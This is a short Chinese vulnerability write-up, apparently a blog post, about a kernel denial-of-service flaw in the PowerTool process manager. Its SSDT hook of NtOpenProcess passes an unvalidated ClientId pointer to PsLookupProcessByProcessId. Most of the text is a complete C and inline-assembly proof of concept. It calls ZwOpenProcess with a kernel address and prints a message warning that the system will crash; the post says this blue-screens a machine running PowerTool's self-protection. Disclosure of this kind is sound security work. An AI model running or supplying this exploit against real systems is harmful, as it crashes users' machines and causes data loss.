百度百科:
PowerTool 一款免费强大的进程管理器,支持进程强制结束,可以Unlock占用文件的进程,查看文件/文件夹被占用的情况,内核模块和驱动的查看和管理,进程模块的内存的dump等功能。最新版还支持上传文件在线扫描病毒。支持离线的启动项和服务的检测和删除,新增注册表和服务的强删功能,可在PE系统下清除感染MBR的病毒(如鬼影等),通过Windows7 SP1的测试。
--------------------------------------------------------------------------------------------------------------
其在加载的时候,为了让不让恶意软件结束自身,而SSDT Hook了NtOpenProcess函数。但是未对Ring3传过来的参数做任何校验就直接使用了,因此,触发漏洞。
示例函数:FakeNtOpenProcess
偏移:ED70
IDA汇编代码如下:
正如上面的汇编代码所示,只要CID参数不为空,他就直接调用了PsLookupProcessByProcessId函数。
而PsLookupProcessByProcessId是内核函数,其自身不会对参数有任何校验:
测试代码:
/*
作者:莫灰灰
博客:http://blog.csdn.net/hu3167343
描述:PowerTool内核拒绝服务漏洞测试程序
*/
#include "stdafx.h"
#include <windows.h>
int _tmain(int argc, _TCHAR* argv[])
{
HMODULE hMod = LoadLibrary(L"ntdll.dll");
if (hMod)
{
PVOID p = GetProcAddress(hMod, "ZwOpenProcess");
if (p)
{
printf("Your System Will Crash, See you nala.\n");
__asm{
push 0x80000000
push 0
push 0
push 0
call p
}
}
}
system("pause");
return 0;
}
Ps:在开启PowerTool自保护的情况下运行上面程序,系统会蓝屏重启。正常机器木有问题。